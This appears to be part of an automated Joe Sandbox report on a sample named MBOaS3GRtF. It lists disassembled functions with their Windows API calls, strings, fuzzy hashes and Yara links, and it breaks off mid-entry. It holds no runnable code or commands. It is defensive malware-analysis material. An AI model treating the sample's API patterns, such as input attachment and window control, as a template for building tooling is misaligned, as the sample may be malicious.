Function 00B02527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02542
GetMenuItemInfoW.USER32(00B65890,000000FF,00000000,00000030), ref: 00B025A3
SetMenuItemInfoW.USER32(00B65890,00000004,00000000,00000030), ref: 00B025D9
Sleep.KERNEL32(000001F4), ref: 00B025EB
GetMenuItemCount.USER32(?), ref: 00B0262F
GetMenuItemID.USER32(?,00000000), ref: 00B0264B
GetMenuItemID.USER32(?,-00000001), ref: 00B02675
GetMenuItemID.USER32(?,?), ref: 00B026BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B02700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02735

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 4fd0f13230e49b25d7f9dd7aa91c03bbb9f86f5b92352365cf9e484804685fff
Instruction ID: 2e8127ad976b58990a90bb7c224e4b076936e5692ca69246ce34d2fcd4c723f4
Opcode Fuzzy Hash: 4fd0f13230e49b25d7f9dd7aa91c03bbb9f86f5b92352365cf9e484804685fff
Instruction Fuzzy Hash: 58615C70900249AFDF21CF64DD88DBE7FF8EB45344F1441A9E842A7291DB72AD19DB21

Function 00B26F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B26FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B26FA8
GetWindowLongW.USER32(?,000000F0), ref: 00B26FCC
_memset.LIBCMT ref: 00B26FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B26FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B27067

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4439f84c776ffadd00df692daac166234a6652d7fd5976e1805b8e0fcc7c01b1
Instruction ID: dbe5ac038eae59f163b3fa00c26045205f7e750e831e478606678f59fefea983
Opcode Fuzzy Hash: 4439f84c776ffadd00df692daac166234a6652d7fd5976e1805b8e0fcc7c01b1
Instruction Fuzzy Hash: 5F619F71900218AFDB21DFA4DC81EEE77F8EF09700F100199FA14AB2A1CB75AD55DB94

Function 00AF6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AF6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00AF6C18
VariantInit.OLEAUT32(?), ref: 00AF6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AF6C4A
VariantCopy.OLEAUT32(?,?), ref: 00AF6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AF6CB1
VariantClear.OLEAUT32(?), ref: 00AF6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00AF6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF6CDC
VariantClear.OLEAUT32(?), ref: 00AF6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF6CF9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: fd11bca3705868f5d15d75d75163cb616568cd17f13d6f92df1fd484d11219f8
Instruction ID: 3915d60959ec381dfc7931aea674af8a56d6b7738effb9581151d0fa78c75a27
Opcode Fuzzy Hash: fd11bca3705868f5d15d75d75163cb616568cd17f13d6f92df1fd484d11219f8
Instruction Fuzzy Hash: 7441217590011D9FCF10EFA8D9449BEBBB9EF08354F008075FA55A7361CB74AA46CBA0

Function 00B15732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B15793
inet_addr.WSOCK32(?,?,?), ref: 00B157D8
gethostbyname.WSOCK32(?), ref: 00B157E4
IcmpCreateFile.IPHLPAPI ref: 00B157F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B158ED
WSACleanup.WSOCK32 ref: 00B158F3

Strings

Ping, xrefs: 00B15816

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 14bc62c4c5ee05f28c21693c82cf6bedc0b8767f6a0b79964aa4075f854e1fa4
Instruction ID: 9125b2e1ebbd87eddd6d75c4460a140508530ecdb9a273d5b3c83cd59adb4760
Opcode Fuzzy Hash: 14bc62c4c5ee05f28c21693c82cf6bedc0b8767f6a0b79964aa4075f854e1fa4
Instruction Fuzzy Hash: 2D517D31604601DFD720AF24CD85BAAB7E4EF89710F4445A9F996EB2E1DB30EC41DB52

Function 00B0B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B0B546
GetLastError.KERNEL32 ref: 00B0B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00B0B5BD

Strings

INVALID, xrefs: 00B0B58F
UNKNOWN, xrefs: 00B0B575
READONLY, xrefs: 00B0B588
NOTREADY, xrefs: 00B0B57C
READY, xrefs: 00B0B596

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: a1285b0d3b51a20cb80ec2f28f45935b5011e2e5d0f7646d9e7026cd061092da
Instruction ID: f9b5d5efccfb61575793e78478f15055d567c398c50e304290644f6601442c6d
Opcode Fuzzy Hash: a1285b0d3b51a20cb80ec2f28f45935b5011e2e5d0f7646d9e7026cd061092da
Instruction Fuzzy Hash: CC318035A002099FCB10DB68CDA5EBE7BF8EF19311F1041E6E905AB2D1DB719A46CB51

Function 00AF8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AF9014
GetDlgCtrlID.USER32 ref: 00AF901F
GetParent.USER32 ref: 00AF903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF903E
GetDlgCtrlID.USER32(?), ref: 00AF9047
GetParent.USER32(?), ref: 00AF9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9066

Strings

ComboBox, xrefs: 00AF8F9C
ListBox, xrefs: 00AF8FD1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b19972d8915b26696c3a764a5ed039689edca3fe720732b729c96eff2e44c4e6
Instruction ID: 8e27a3e2f803d3a35e89291da2b08c6a203540274df30fc6e3c417c915fe7bd1
Opcode Fuzzy Hash: b19972d8915b26696c3a764a5ed039689edca3fe720732b729c96eff2e44c4e6
Instruction Fuzzy Hash: 0B21D074A00109BBDF15ABA0CC85EFEBBB4EF49310F104169BA21972F1DF795819DB20

Function 00AF907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AF90FD
GetDlgCtrlID.USER32 ref: 00AF9108
GetParent.USER32 ref: 00AF9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9127
GetDlgCtrlID.USER32(?), ref: 00AF9130
GetParent.USER32(?), ref: 00AF914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF914F

Strings

ComboBox, xrefs: 00AF9087
ListBox, xrefs: 00AF90BC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 0b9646235727cb55f707552b7309b8721b2195da72017e6f9a8e7239617e5dc5
Instruction ID: 46a2714bde2ce798da3c987f324ecca640a27e99899bcbe325c3c33121530cbe
Opcode Fuzzy Hash: 0b9646235727cb55f707552b7309b8721b2195da72017e6f9a8e7239617e5dc5
Instruction Fuzzy Hash: 2321C274A00109BBDF11ABE5CC89FFEBBB8EF49300F10416ABA11972A1DF755819DB20

Function 00AF9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AF916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00AF9184
_wcscmp.LIBCMT ref: 00AF9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AF9211

Strings

smallicons, xrefs: 00AF91D9
details, xrefs: 00AF91BF
SHELLDLL_DefView, xrefs: 00AF9190
list, xrefs: 00AF91F3
largeicons, xrefs: 00AF91A5

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: db852495ee5ba8432808ef99f18f6c0c3aa1d8a43a9799c534ffbaf759f82099
Instruction ID: 552de2470954a152b3d984de5dae256e6e8419f82ebb7401074d2ae0e4f63ee1
Opcode Fuzzy Hash: db852495ee5ba8432808ef99f18f6c0c3aa1d8a43a9799c534ffbaf759f82099
Instruction Fuzzy Hash: E311CA3A28830BBAFA212664EC0AFF73BECDB15721F200166FE00A54F1FE6158555694

Function 00B188AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B188D7
CoInitialize.OLE32(00000000), ref: 00B18904
CoUninitialize.OLE32 ref: 00B1890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00B18A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B18B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B32C0C), ref: 00B18B6F
CoGetObject.OLE32(?,00000000,00B32C0C,?), ref: 00B18B92
SetErrorMode.KERNEL32(00000000), ref: 00B18BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B18C25
VariantClear.OLEAUT32(?), ref: 00B18C35

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 585167c88bb830d315e61934c42e053ffaf40b0c1ecbd8aefd5c3e55835130ce
Instruction ID: 63e199a6b77e9b16e80f746194a29ce4f029952cf4119dafd2e87f7419801452
Opcode Fuzzy Hash: 585167c88bb830d315e61934c42e053ffaf40b0c1ecbd8aefd5c3e55835130ce
Instruction Fuzzy Hash: BDC147B1208305AFC700DF68C88496BB7E9FF89348F4049ADF9899B251DB71ED46CB52

Function 00B07990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B07A6C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 5197b48994eef0e495fe702cb8b9133827856917bfbd1d8ccaafd549e014e300
Instruction ID: 57fb762d5d8aa5047c27fc2bf2d70acd61bdc4e70968ac2a0bb512c0b6bac6ed
Opcode Fuzzy Hash: 5197b48994eef0e495fe702cb8b9133827856917bfbd1d8ccaafd549e014e300
Instruction Fuzzy Hash: 06B17D71D4420A9FEB10DFA4C884BBEBBF4FF09321F2444A9E551E7281DB74A941CBA0

Function 00B011CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B011F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B00268,?,00000001), ref: 00B01204
GetWindowThreadProcessId.USER32(00000000), ref: 00B0120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00268,?,00000001), ref: 00B0121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00268,?,00000001), ref: 00B01245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00268,?,00000001), ref: 00B01257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B00268,?,00000001), ref: 00B0129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00268,?,00000001), ref: 00B012B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00268,?,00000001), ref: 00B012BC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2919cb7300e25aefdd3339f5ae7bafef746bc29552a3459f87153ac635b86bb2
Instruction ID: 506c86493e61f573edd0d8dca52eb199994aae5aa52a91fab3368f4862ea52d0
Opcode Fuzzy Hash: 2919cb7300e25aefdd3339f5ae7bafef746bc29552a3459f87153ac635b86bb2
Instruction Fuzzy Hash: 46318D75A00204BBDB259F58ED88BB97BF9EB59311F118569F900D71E0DBB89D40CB60

Function 00ADBDA2 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00AA2231
SetTextColor.GDI32(?,000000FF), ref: 00AA223B
SetBkMode.GDI32(?,00000001), ref: 00AA2250
GetStockObject.GDI32(00000005), ref: 00AA2258
GetClientRect.USER32(?), ref: 00ADBDBB
SendMessageW.USER32(?,00001328,00000000,?), ref: 00ADBDD2
GetWindowDC.USER32(?), ref: 00ADBDDE
GetPixel.GDI32(00000000,?,?), ref: 00ADBDED
ReleaseDC.USER32(?,00000000), ref: 00ADBDFF
GetSysColor.USER32(00000005), ref: 00ADBE1D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 46f9580cced3c7d22d443c1890ad8377ada44e756311d91e4506de6e2afa5981
Instruction ID: 3ba735868025cb023c8d59e519fe0b46fc9e3ee18aaf5c3dc2958b78ff3bd943
Opcode Fuzzy Hash: 46f9580cced3c7d22d443c1890ad8377ada44e756311d91e4506de6e2afa5981
Instruction Fuzzy Hash: EF211731500206EFDB215BA4ED09BE97B71EB19322F504275FA26961F1CF314966DF11

Function 00AAFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AAFAA6
OleUninitialize.OLE32(?,00000000), ref: 00AAFB45
UnregisterHotKey.USER32(?), ref: 00AAFC9C
DestroyWindow.USER32(?), ref: 00AE45D6
FreeLibrary.KERNEL32(?), ref: 00AE463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE4668

Strings

close all, xrefs: 00AAFAA1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 89590e577f6179e4817928cfdee2605aee9cc224bd5f6920c332063f5023c2f7
Instruction ID: cba737ac9d11e65d6bc0c2c3f9b34664e851f27683884426be118a66197842ad
Opcode Fuzzy Hash: 89590e577f6179e4817928cfdee2605aee9cc224bd5f6920c332063f5023c2f7
Instruction Fuzzy Hash: F7A15131701112CFCB29EF55C595E69F7B8BF0A710F5542ADE80AAB2A1DB30AD16CF50

Function 00AFA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00AFA439), ref: 00AFA377

Strings

NAME, xrefs: 00AFA1A9
REGEXPCLASS, xrefs: 00AFA13C
CLASS, xrefs: 00AFA0F6
TEXT, xrefs: 00AFA2AE
CLASSNN, xrefs: 00AFA119
INSTANCE, xrefs: 00AFA285

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 73b268e8b5a2cf3afaadc2084ea165fcb63aa0efac21069769ae9298e78a4d24
Instruction ID: bf3bde4f9e8f06324a611bfdbffe34e38c9940217b3380775ac1d605fbf510a0
Opcode Fuzzy Hash: 73b268e8b5a2cf3afaadc2084ea165fcb63aa0efac21069769ae9298e78a4d24
Instruction Fuzzy Hash: D491C271A04609AACB08DFE0C581FFEFBB8BF14300F508119E95DA7291DF316999CBA1

Function 00AA2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00AA2EAE

Part of subcall function 00AA1DB3: GetClientRect.USER32(?,?), ref: 00AA1DDC
Part of subcall function 00AA1DB3: GetWindowRect.USER32(?,?), ref: 00AA1E1D
Part of subcall function 00AA1DB3: ScreenToClient.USER32(?,?), ref: 00AA1E45

GetDC.USER32 ref: 00ADCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ADCD45
SelectObject.GDI32(00000000,00000000), ref: 00ADCD53
SelectObject.GDI32(00000000,00000000), ref: 00ADCD68
ReleaseDC.USER32(?,00000000), ref: 00ADCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ADCDFB

Strings

U, xrefs: 00ADCCD0

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: db488f47ed9725317271185d39868e4cf5c1dd7bea57e6160ae0cafc82cb47eb
Instruction ID: 98b4eb3e922c7c07ab12f6290d9100b5f867cee9819709b5cb99f6df551bec89
